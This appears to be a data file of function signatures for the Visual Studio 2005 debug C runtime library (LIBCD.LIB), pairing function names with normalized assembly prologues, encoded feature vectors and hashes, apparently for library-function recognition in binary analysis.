+_strcoll,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nJMP SHORT CONST",T4vMCgAAAAAAAAAAQDwSK0+LzAoAAAAAXqODJ222pwYAAAAAmC8l00+LzAoAAAAAbbanBk+LzAoAAAAAPz4kcZgvJdNeo4MnchMCgD8+JHFAPBIr,[],a1121b151b4507fe772e9286252b3be70ba59f64,VS2005,LIBCD.LIB
+__putw,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOVSX R32,BYTE PTR DS:[R32]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32",kvTRAeRSvJ91gwavmT2U5gAAAAAAAAAAnM1RCzHpBKCntFwk5FK8n5yGUTiczVEL9CnuCJk9lOYAAAAAMekEoHrgCEb0Ke4I+fCrWn0JSDQAAAAAXuT1O8hSX9cAAAAAp7RcJPnwq1pe5PU7euAIRgAAAAAAAAAAfQlINDHpBKCntFwkyFJf130JSDQAAAAAnIZROORSvJ+S9NEBdYMGr5yGUTiczVEL8LQQDORSvJ+S9NEB,[],8ed77a1495301cabc2634359e8cac154bb11a621,VS2005,LIBCD.LIB
+_tmpfile,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOVSX R32,BYTE PTR DS:[0]\nTEST R32,R32\nJCC CONST",H7mul9pHITH+Ikd8eF2amHcvm9c1FnITnIZROB+5rpc1FnIT99QFbV6jgydeo4Mn99QFbXhdmpg1FnITJu7hZU+LzAoAAAAAAtPm2PfUBW18HUMFT4vMCgAAAAAAAAAAXqODJ5yGUTgAAAAA2kchMU+LzAoAAAAAXqODJ3cvm9cAAAAA/iJHfCbu4WUAAAAAdy+b15yGUTgkA8OdfB1DBXhdmpgAAAAAJAPDnZyGUTj31AVtNRZyEybu4WUAAAAANRZyEybu4WUAAAAANRZyEybu4WUAAAAA,[],e3304979329a55c59b37bb98e90c162f206163c8,VS2005,LIBCD.LIB
+_tmpnam,"PUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",peCYT/fUBW18HUMFJu7hZQDh1msAAAAAnIZROLH25fL0Ke4I99QFbV6jgydeo4MnXqODJybu4WUAAAAAum9HmJyGUTj31AVtfB1DBbpvR5gAAAAAXqODJybu4WUAAAAAXqODJ7pvR5gAAAAAoDc6oQDh1msAAAAA99QFbbpvR5heo4Mn9CnuCKA3OqEAAAAAAOHWawAAAAAAAAAAsfbl8qA3OqEAAAAA,[],bbb20e3a558b1bb966a9acec1fc7417c026ca425,VS2005,LIBCD.LIB
+___inc_tmpoff,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR DS:[0]\nADD R32,CONST\nMOV DWORD PTR DS:[0],R32\nPOP EBP\nRETN",M3LQ4QAAAAAAAAAA,[],6209a4aae5c7642a5940f85432bde1f02bdd0bd1,VS2005,LIBCD.LIB
+__mbsnbcoll,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",DczAAU+LzAoAAAAAT4vMCgAAAAAAAAAAEl6IA9o3INqXcVGel3FRnk+LzAoAAAAAjLRRThJeiAMNzMAB2jcg2k+LzAoAAAAA,[],8c907dd6720b9ea5d479ba512ab2f15909a59902,VS2005,LIBCD.LIB
+__lseek,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],-1\nJCC CONST",nIZROHkfMYKZeO5v7bLtN+ikXWgGYojDda1LDU+LzAoAAAAAmXjub0+LzAoAAAAAT4vMCgAAAAAAAAAAT6vMHEux5fN1rUsNbGYbnJyGUTgAAAAA6KRdaE+LzAoAAAAABmKIw0+rzBzopF1oS7Hl85Zz8F9sZhuceR8xgk+LzAoAAAAAlnPwX5yGUTgAAAAA,[],f0c1b94e383a7d39c80f4197679eed1e09bc085b,VS2005,LIBCD.LIB
+__getpid,"PUSH EBP\nMOV EBP,ESP\nCALL DWORD PTR DS:[0]\nPOP EBP\nRETN",JQZ0sQAAAAAAAAAA,[],7121ee3147c65982419ca5463b049c0d84c4bf1c,VS2005,LIBCD.LIB
+_sin,FLD TBYTE PTR DS:[0]\nFXCH ST(1)\nFPREM1\nWAIT\nFSTSW R16\nSAHF\nJCC CONST,j+uX3gVtZtDRSJSlN9QtU9FIlKUAAAAA0UiUpXtGESB7RhEgAFkkeehVq9qc7n8wLLApNwVtZtDRSJSl6FWr2jfULVPNLBGmBW1m0CywKTdvZoaA0UiUpYp8rQWKfK0FzSwRpjfULVOQ4qERe0YRIAAAAAAAAAAALLApNyywKTdvZoaAkOKhEXtGESB7RhEginytBQVtZtAAAAAAnO5/MCywKTeP65feb2aGgNFIlKUAAAAA,[],06bb0b69f249e2bf478feae68a7c56b90bbd08f3,VS2005,LIBCD.LIB
+__CIsin,"SUB ESP,CONST\nFST QWORD PTR SS:[ESP]\nCALL CONST\nCALL CONST\nADD ESP,CONST\nRETN",2jyUmAAAAAAAAAAA,vKBd6AAAAAAAAAAAAaF1swAAAAAAAAAAdqHX0LygXegBoXWz,a546b35194009c601768b18e6a48dd7d0d9faa4b,VS2005,LIBCD.LIB
+__cprintf,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",bwH6MQAAAAAAAAAA,NRZyEzNv5LMAAAAAUyrwCjUWchM70T3ze6p/4VMq8ApZIazuyr9gBQAAAAAAAAAAO9E98wAAAAAAAAAAOLbmXzNv5LMAAAAAfkZDdMq/YAV7qn/hM2/ks8q/YAV+RkN0WSGs7gJNP5sAAAAAAk0/mzUWchM70T3ze6p/4VMq8Ap7qn/h,4ba5d16ee2d52bc0d230c69850543570b17f8d7f,VS2005,LIBCD.LIB
+__flsbuf,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",u/zg2xv9HM7hGvN9MekEoOQzZQq7/ODblnPwX2QVua0AAAAAZBW5rWI5CmLYohxrt5wE4+RSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8n6ySBON4S6roeEuq6JyGUThs4A7x2KIca2I5CmIAAAAAkvTRAeRSvJ91gwaviw0UTC8CckKLDRRMn7/j+ZhQxdIAAAAA4RrzfeQzZQoAAAAAiw0UTJ+/4/kvAnJCnIZROORSvJ+S9NEBYjkKYoOuQ14AAAAALwJyQphQxdKfv+P5N3J67IOuQ14AAAAAdYMGr5yGUTjxDCV65FK8n5yGUTjxDCV68QwlegoWWKgx6QSgG/0czsSg0gkAAAAAbOAO8WI5CmIAAAAAmFDF0jdyeuyskgTjg65DXtQn+1hwSO365DNlCphQxdKLDRRMcEjt+sSg0gkAAAAAMekEoDHpBKAKFliorJIE4+RSvJ/b6hIUnIZROJZz8F+uDSSPrg0kj2QVua0AAAAAChZYqMSg0gkAAAAA2+oSFORSvJ87j6vl1Cf7WMSg0gkAAAAAxKDSCQAAAAAAAAAA,[],82443572765d2c5faa0662bd37a0fffc55e7bfeb,VS2005,LIBCD.LIB
+__mbscat,"MOV R32,DWORD PTR DS:[R32]\nMOV R32,CONST\nADD R32,R32\nXOR R32,CONST\nXOR R32,R32\nADD R32,CONST\nTEST R32,CONST\nJCC CONST",6FWr2hFkM4Neo4MnXqODJzUpQDIAAAAAK8VrCwAAAAAAAAAAEWQzgzwKGl0AAAAA2D80UAAAAAAAAAAAEWQzgzwKGl0AAAAAPlbIuglmNtRcpTmJPAoaXQlmNtRcpTmJXKU5idg/NFDKHLxByhy8QVylOYleo4MnXqODJwlmNtQAAAAAK/LdbzUpQDJcpTmJHZ+F0B2fhdDYzQSmEWQzgzwKGl0AAAAACWY21B2fhdDYzQSmXKU5iRFkM4NY2ig6WNooOlylOYk1KUAyNSlAMjUpQDKEcIcd2M0Eptg/NFDYzQSm2M0EpivFawtY2ig6WNooOg3h1QtY2ig6WNooOhuBMI1eo4MnhHCHHT5WyLrYzQSmXqODJx2fhdAAAAAAG4EwjQAAAAAAAAAA2M0EphFkM4PoVava6FWr2hFkM4PoVavaDeHVCwAAAAAAAAAA,[],80452bfc2b524de5a0974cd54baafe3b23557674,VS2005,LIBCD.LIB
+__mbscpy,"MOV R32,CONST\nMOV R32,DWORD PTR DS:[R32]\nADD R32,R32\nXOR R32,CONST\nXOR R32,R32\nMOV R32,DWORD PTR DS:[R32]\nADD R32,CONST\nTEST R32,CONST",yhy8QVylOYleo4MnXKU5idg/NFDKHLxBXqODJz/fYOsAAAAA2D80UAAAAAAAAAAAG4EwjQAAAAAAAAAAXqODJwlmNtQAAAAA2M0Eptg/NFDYzQSmP99g6wlmNtQAAAAADeHVCwAAAAAAAAAA2M0EpivFawtY2ig6CWY21D/fYOvYzQSmWNooOhuBMI1eo4MnWNooOg3h1QtY2ig6PAoaXQlmNtRcpTmJK8VrCwAAAAAAAAAAq15nETwKGl0AAAAA,[],269da68a18aef089c623ee69809bb45047be1c3c,VS2005,LIBCD.LIB
+_remove,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nOR R32,CONST\nJMP SHORT CONST",lnPwX5yGUTgAAAAAJu7hZU+LzAoAAAAAT4vMCgAAAAAAAAAAqGrdepZz8F9sZhucbGYbnJyGUTgAAAAAnIZROCbu4WWZeO5vmXjub0+LzAoAAAAA,[],22920474c3a57beeaeeab380b9c4f579ebd09c8b,VS2005,LIBCD.LIB
+__unlink,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPOP EBP\nRETN",NV3SuwAAAAAAAAAA,bGYbnJyGUTgAAAAAlnPwX5yGUTgAAAAAJu7hZU+LzAoAAAAAT4vMCgAAAAAAAAAAqGrdepZz8F9sZhucnIZROCbu4WWZeO5vmXjub0+LzAoAAAAA,a1cd9a193cdca3f0d3bd9876c6debf52e442d563,VS2005,LIBCD.LIB
+__except_handler2,"PUSH EBP\nMOV EBP,DWORD PTR DS:[R32+CONST]\nPUSH -1\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPOP EBP\nTEST DWORD PTR DS:[R32],CONST",P1p894/1BRqN1cO5l3FRnv5P0mgAAAAA/k/SaAAAAAAAAAAAl3FRnv5P0mgAAAAAu7ZcLJdxUZ75y5whIYd5Y5dxUZ4Vx7Oaj/UFGgAAAAAAAAAAFcezmru2XCwAAAAA+cucIUWew+sTjQ/zRZ7D67u2XCwAAAAAjdXDuZdxUZ75y5whE40P80Wew+shh3lj,[],77bd43ab3b2a6d76b44563e6f852015188d64b02,VS2005,LIBCD.LIB
+__execl,"PUSH CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPOP R32",xC81/gAAAAAAAAAAdYMGr6QXY2+chlE45FK8n6QXY2+chlE45FK8n6QXY2/ELzX+kvTRAeRSvJ91gwavnIZROORSvJ+S9NEBs1oPwORSvJ+S9NEBdYMGr5yGUTikF2Nv5FK8n5yGUTikF2NvkvTRAeRSvJ91gwavnIZROORSvJ+S9NEBpBdjb+RSvJ+S9NEBdYMGr5yGUTikF2Nv5FK8n5yGUTikF2NvkvTRAeRSvJ91gwavO4+r5eRSvJ8AAAAApBdjb+RSvJ+S9NEBkvTRAeRSvJ87j6vl,[],3c04dcf499923156bc51f69ee0b9b8e75190baa3,VS2005,LIBCD.LIB
+_wcsncpy,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",1hmIcZyGUTg1pojmnIZRONUc1LbU2e7LnIZROJyGUTg1pojm1Nnuy9Uc1Lbds2eG1RzUtgAAAAAAAAAANaaI5pyGUTjIUl/XyFJf15yGUTgAAAAA3bNnhtTZ7ssAAAAA,[],c69bb01ec6ee0cdac2ca60dc87aa9c6e9a3f9a78,VS2005,LIBCD.LIB
+___InternalCxxFrameHandler,"CALL CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nAND R32,CONST\nTEST R32,R32\nJCC CONST",KrNC3k+LzAoAAAAADt/kkHqTIX7XsJf3XyOayU+LzAoAAAAAT4vMCgAAAAAAAAAAIVRF3k+LzAoAAAAAKdmrsPzEoKqchlE4G5YhmHqTIX5fI5rJ9CnuCDHpBKAAAAAA17CX93qTIX4bliGY/MSgqk+LzAoAAAAAnIZROPzEoKohVEXeBcIA1CnZq7Ap2auwepMhfk+LzAoAAAAAKdmrsCqzQt4O3+SQjs8kCQXCANT0Ke4IMekEoCnZq7Ap2auw,[],44b3b18466af87cede233a653248207cb572b99d,VS2005,LIBCD.LIB
+___FrameUnwindToState,"CALL CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV DWORD PTR SS:[EBP+CONST],0\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nCMP DWORD PTR DS:[R32+R32*8+CONST],0\nJCC CONST",g65DXhN9aln0Ke4IJ6WmYPQp7gis4j/12WF3nfQp7gis4j/19CnuCEZqCXQAAAAAduUUZoOuQ16chlE49CnuCNj1TV4AAAAArOI/9dj1TV4AAAAAE31qWQAAAAAAAAAA2PVNXnblFGYAAAAAnIZRONlhd53sdoa7RmoJdAAAAAAAAAAA9CnuCCelpmAAAAAA5u+4h4OuQ16chlE47HaGu9lhd530Ke4I,[],6f601bfb28242767df12e2e29750458d39bb5502,VS2005,LIBCD.LIB
+?_DestructExceptionObject@@YAXPAUEHExceptionRecord@@E@Z,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR FS:[0],R32\nPOP R32\nPOP R32\nPOP R32\nMOV ESP,EBP\nPOP EBP\nRETN",BtWLo4DmHLzku82g5LvNoIDmHLyp6qQugOYcvAAAAAAAAAAAqeqkLoDmHLwAAAAA,[],9b0f195643bd800b0db5e25cb2d6b9dc3c9c29f9,VS2005,LIBCD.LIB
+_fputws,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],0\nCMP DWORD PTR SS:[EBP+CONST],0",5FK8n5yGUTiX4JCxuz1JhQAAAAAAAAAA7xfqreRSvJ+S9NEBKcvMXl6jgyf0Ke4Il+CQsX0JSDQAAAAAkvTRAeRSvJ91gwav9CnuCLs9SYUAAAAAnIZROORSvJ+S9NEBdYMGr5yGUTichlE45FK8n5yGUTichlE4kvTRAeRSvJ91gwavdYMGr5yGUTiX4JCxnIZROORSvJ+S9NEBXqODJ30JSDQAAAAAfQlINLs9SYUpy8xe,[],f16f126871b936e978f7919b4bf1039d0651578a,VS2005,LIBCD.LIB
+___CxxFrameHandler,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nCLD\nMOV DWORD PTR SS:[EBP+CONST],R32",9UjRRgAAAAAAAAAA,G5YhmFOcP6dfI5rJKdmrsCqzQt4O3+SQjs8kCauuGrT0Ke4IMekEoCnZq7Ap2auwU5w/pyqzQt4AAAAAKrNC3k+LzAoAAAAADt/kkFOcP6fXsJf3T4vMCgAAAAAAAAAAKdmrsPzEoKqchlE4XyOayU+LzAoAAAAA9CnuCDHpBKAAAAAA17CX91OcP6cbliGY/MSgqk+LzAoAAAAAnIZROPzEoKqRSd71q64atDHpBKAAAAAAkUne9fzEoKoAAAAA,451a9893953fd0b4071980295d2b8e1eb93aece3,VS2005,LIBCD.LIB
+?_JumpToContinuation@@YGXPAXPAUEHRegistrationNode@@@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH R32\nPUSH R32\nPUSH R32\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST",YtYcGAAAAAAAAAAA,[],ff70b9726ce7f40af7121b64dbf7d5f0607f07e9,VS2005,LIBCD.LIB
+___CxxLongjmpUnwind@4,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[R32+CONST]\nPUSH R32",N+H3vAAAAAAAAAAA,nIZROKuuGrTsdoa7RmoJdAAAAAAAAAAAzAVHrnblFGYAAAAA7HaGu6uuGrT0Ke4I9CnuCCelpmAAAAAAg65DXhN9aln0Ke4IJ6WmYPQp7giP+2b89CnuCEZqCXQAAAAAduUUZoOuQ16chlE49CnuCNj1TV4AAAAAj/tm/PQp7ggAAAAAE31qWQAAAAAAAAAAq64atCelpmAAAAAA2PVNXnblFGYAAAAA,9d860f828e22f613f376826b12c642b032e9ad9b,VS2005,LIBCD.LIB
+?_CallMemberFunction1@@YGXPAX00@Z,"POP R32\nPOP R32\nXCHG DWORD PTR SS:[ESP],R32\nJMP R32",na+F4wAAAAAAAAAA,[],d397476994e8454e47be6a36fea85a7ab0c4df28,VS2005,LIBCD.LIB
+?_CallMemberFunction0@@YGXPAX0@Z,"POP R32\nPOP R32\nXCHG DWORD PTR SS:[ESP],R32\nJMP R32",na+F4wAAAAAAAAAA,[],d397476994e8454e47be6a36fea85a7ab0c4df28,VS2005,LIBCD.LIB
+?_GetRangeOfTrysToCheck@@YAPBU_s_TryBlockMapEntry@@PBU_s_FuncInfo@@HHPAI1@Z,"MOV R32,DWORD PTR SS:[EBP+CONST]\nDEC R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nLEA R32,DWORD PTR DS:[R32+R32*4]\nLEA R32,DWORD PTR DS:[R32+R32*4]\nCMP DWORD PTR DS:[R32+CONST],R32\nJCC CONST",QUXQGyp/XbgAAAAAKn9duMGM7u9y6DpF3xPA5QvN4XO7tlwsu7ZcLBPmCZjBjO7vu7ZcLC5Vuf4LzeFzx/Mtzip/Xbi7tlwswYzu7xPmCZgAAAAAC83hcy5Vuf4AAAAAE+YJmLu2XCzfE8Dlcug6RV7oaDnBjO7vwYzu717oaDkAAAAALlW5/ru2XCxBRdAbXuhoOQAAAAAAAAAA,[],4fabe604789f9db37417d4bf8bd4ed6a1f404f3b,VS2005,LIBCD.LIB
+?_UnwindNestedFrames@@YGXPAUEHRegistrationNode@@PAUEHExceptionRecord@@@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nMOV R32,DWORD PTR FS:[0]\nMOV DWORD PTR SS:[EBP+CONST],R32",OkDb9QAAAAAAAAAA,SVR/FAAAAAAAAAAA,f8d93c21a524d78a0570f8a9fe1e7043c9743358,VS2005,LIBCD.LIB
+?_CallMemberFunction2@@YGXPAX00H@Z,"POP R32\nPOP R32\nXCHG DWORD PTR SS:[ESP],R32\nJMP R32",na+F4wAAAAAAAAAA,[],d397476994e8454e47be6a36fea85a7ab0c4df28,VS2005,LIBCD.LIB
+?_CallSETranslator@@YAHPAUEHExceptionRecord@@PAUEHRegistrationNode@@PAX2PBU_s_FuncInfo@@H1@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],0\nMOV DWORD PTR SS:[EBP+CONST],0",RIlivbs9SYUAAAAAuO/3I0SJYr0DK+eLAyvni7s9SYUAAAAAuz1JhQAAAAAAAAAA,[],f51c08e84374c29a780904a03f0efa96371ecd85,VS2005,LIBCD.LIB
+?_CallCatchBlock2@@YAPAXPAUEHRegistrationNode@@PBU_s_FuncInfo@@PAXHK@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nMOV DWORD PTR SS:[EBP+CONST],0\nMOV DWORD PTR SS:[EBP+CONST],0",REgxXAAAAAAAAAAA,2e8PcNHRKE0qs0LeKrNC3tHRKE0AAAAA0dEoTQAAAAAAAAAA,04f898c2420b92b68da9f70c8f1a51a3aa8d5fa6,VS2005,LIBCD.LIB
+_sprintf,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32",5FK8n5yGUTichlE4kvTRAeRSvJ87j6vlFnKdaLs9SYUAAAAAjNC7ers9SYUAAAAAnIZROORSvJ+S9NEBS3YbfJyGUTgAAAAAO4+r5eRSvJ8AAAAA5FK8n5yGUTikluVCkvTRAeRSvJ87j6vlpJblQozQu3oWcp1ouz1JhQAAAAAAAAAAnIZROORSvJ+S9NEBO4+r5eRSvJ8AAAAA,[],bd374f8b0fdf1d6af926937c5a026dc0bebfc1e7,VS2005,LIBCD.LIB
+_vwprintf,"PUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nCMP R32,CONST",nIZROORSvJ+S9NEBO4+r5eRSvJ8AAAAA5FK8n5yGUTgdMgNZkvTRAeRSvJ87j6vlHTIDWQAAAAAAAAAAQAz7yZyGUTgAAAAA,[],24ac3e947ea0e68e5e3842030ed46a122db555c7,VS2005,LIBCD.LIB
+__strupr,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],0\nCMP DWORD PTR DS:[CONST],0\nJCC CONST",pBdjb8uCy5VtSQUGtt5rDU+LzAoAAAAAXqODJ7beaw0AAAAAs8GdWF6jgycAAAAASv/IwmgitGpeo4Mny4LLlU+LzAoAAAAAbUkFBl6jgydtSQUGcVqUOqQXY28AAAAAXqODJ7beaw0AAAAAjalP6rbeaw0AAAAAT4vMCgAAAAAAAAAAXqODJ7beaw0AAAAAbUkFBl6jgyezwZ1Yl83Vgkr/yMJeo4MnPsqG2aQXY28AAAAAXqODJz7KhtkAAAAAcv8ZO5fN1YJxWpQ6aCK0ao2pT+peo4Mn,[],53bb99400567acb749ebd0d4f9a88dded9833144,VS2005,LIBCD.LIB
+??2@YAPAXI@Z,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPOP EBP",FGPB2wAAAAAAAAAA,XhpGTgAAAAAAAAAA,13b93e1e7b6fb0b45b62e84d9b9404661d8950f8,VS2005,LIBCD.LIB
+_wcstombs,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nLEA R32,DWORD PTR SS:[EBP+CONST]",KiAgFB4YujmchlE4oDc6ocSg0gkAAAAAnIZROOx2hrseGLo5JAPDnY6w7Hr+Ikd8Hhi6OcSg0gkAAAAAtnZHYZyGUTichlE4/iJHfMSg0gkAAAAAnIZROJyGUTjzmtTn85rU58Sg0gkAAAAA7HaGu/Qp7gjLgsuVjrDsenWtSw2chlE4O4+r5eRSvJ8AAAAAnIZROB4YujniUDGBnIZROB4YujkC6H/0y4LLlcSg0gkAAAAAnIZROJyGUThmeTE1Auh/9HblFGYeGLo59CnuCIOuQ14AAAAATc7Ff8hSX9fLgsuV4lAxgcuCy5U+yobZnIZROORSvJ+S9NEBHhi6OcSg0gkAAAAAgudAo4OuQ14AAAAAkvTRAeRSvJ87j6vlg65DXsuCy5W7ndC6y4LLlcSg0gkAAAAAPsqG2cuCy5UAAAAAyFJf14OuQ14AAAAAg65DXqPnruPT7XHfduUUZqA3OqG9MsH4nIZRONo3INp1rUsNZnkxNcSg0gkAAAAAy4LLlcSg0gkAAAAAda1LDcSg0gkAAAAAy4LLlcSg0gkAAAAA0+1x316jgyegNzqhHhi6OcSg0gkAAAAAvTLB+B4YujmchlE40UiUpbjQ2IachlE45FK8n5yGUThpzQYA2jcg2sSg0gkAAAAAac0GACQDw50kA8OdxKDSCQAAAAAAAAAAuNDYhpyGUTichlE4JAPDndFIlKWDrkNecSeUEB4YujmchlE4oDc6ocSg0gkAAAAAnIZROCogIBRxJ5QQXqODJ4LnQKMAAAAAo+eu43blFGYAAAAAHhi6OcSg0gkAAAAAu53Quk3OxX8eGLo5,[],acba569c149ad14e2bc009a1e9a6015a1308835c,VS2005,LIBCD.LIB
+__expand_base,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",AN9OVU+LzAoAAAAAT6vMHJyGUTiL9kx7oDc6oU+LzAoAAAAASfMRmaA3OqEA305VnIZROMr3FvXOX7eUVaatKE+rzBwNzMABzl+3lE+LzAoAAAAAi/ZMe6A3OqFJ8xGZyvcW9U+LzAoAAAAAT4vMCgAAAAAAAAAADczAAU+LzAoAAAAA,[],bfeb5cacfb70a49821ff01f2b52207bfd766f760,VS2005,LIBCD.LIB
+___crtGetEnvironmentStringsW,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nLEA R32,DWORD PTR DS:[R32+R32+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",nIZROPh3+cF2/Pqmdvz6pvh3+cFmeTE1GaZm/9FIlKUAAAAAJu7hZU+LzAoAAAAAAVzDUaQXY28AAAAAXqODJyEgQSUAAAAAzMA8UHr3XXGV73oQdvz6pmZ5MTUZpmb/ZnkxNU+LzAoAAAAA+Hf5waQXY28AAAAAle96EE+LzAoAAAAApBdjb6gKbkT/PECfGaZm/9FIlKUAAAAA/zxAn8+pD+RmeTE1ZnkxNU+LzAoAAAAA7oakYaQXY28AAAAA0UiUpdFIlKWchlE4le96EE+LzAoAAAAAnNQxu0+LzAoAAAAApBdjb5zUMbuuZkzenIZROKeC9O92/Pqm0UiUpSbu4WWchlE4rmZM3gFcw1FT13mHdvz6pqeC9O9meTE1ZnkxNU+LzAoAAAAAz6kP5KQXY28AAAAAT4vMCgAAAAAAAAAAZnkxNU+LzAoAAAAA86W31dFIlKV2/Pqmp4L078zAPFBxv1DBevddcU+LzAoAAAAAISBBJczAPFBxv1DBcb9QwV6jgycAAAAAU9d5h0+LzAoAAAAAqApuRO6GpGGV73oQdvz6pnb8+qYZpmb/,[],d00a73c11b760fda74690edb5c14b2d6ce4b77a8,VS2005,LIBCD.LIB
+_putwchar,"PUSH EBP\nMOV EBP,ESP\nMOV R16,WORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPOP EBP\nRETN",x8hLbAAAAAAAAAAA,32j8PwAAAAAAAAAA,7dfd0217d9cd7c75f10fb1a3360c4f103006e86b,VS2005,LIBCD.LIB
+__fputwchar,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nMOV R16,WORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nPOP EBP",32j8PwAAAAAAAAAA,Pp4aNE+LzAoAAAAA8om3zpUWfvyntFwklJZEXKe0XCS0cKtsp7RcJCFXxbuxGY/Xzax436e0XCS0cKts8om3zlUr6wD+o4/InIZROJUWfvyntFwkp7RcJPKJt85Lf0gHtHCrbJyGUTim1GmVsRmP10+LzAoAAAAAnIZROFUr6wD+o4/I/qOPyE+LzAoAAAAAVSvrAE+LzAoAAAAAS39IB5yGUTgAAAAAptRplU+LzAoAAAAAS5ltOKe0XCQp2auwp7RcJPKJt87Fs5pmIVfFuwAAAAAAAAAAnIZROKe0XCSntFwkp7RcJPKJt85Lf0gHKdmrsJSWRFydWiLm8om3zj6eGjSVFn78xbOaZpyGUTgAAAAAT4vMCgAAAAAAAAAAnVoi5s2seN8AAAAAS39IB5yGUTgAAAAAnIZROD6eGjSVFn78lRZ+/E+LzAoAAAAA,ee630930184a31ec81f5b17664f424fcbd6466a9,VS2005,LIBCD.LIB
+__rt_probe_read4@4,"PUSH EBP\nMOV EBP,ESP\nPUSH -1\nPUSH CONST\nPUSH CONST\nMOV R32,DWORD PTR FS:[0]\nPUSH R32\nMOV DWORD PTR FS:[0],ESP",hjXYYwAAAAAAAAAAqE+nOIY12GMAAAAA,[],e70ef54c4ee4f527a5e99da601cc2414cb59314a,VS2005,LIBCD.LIB
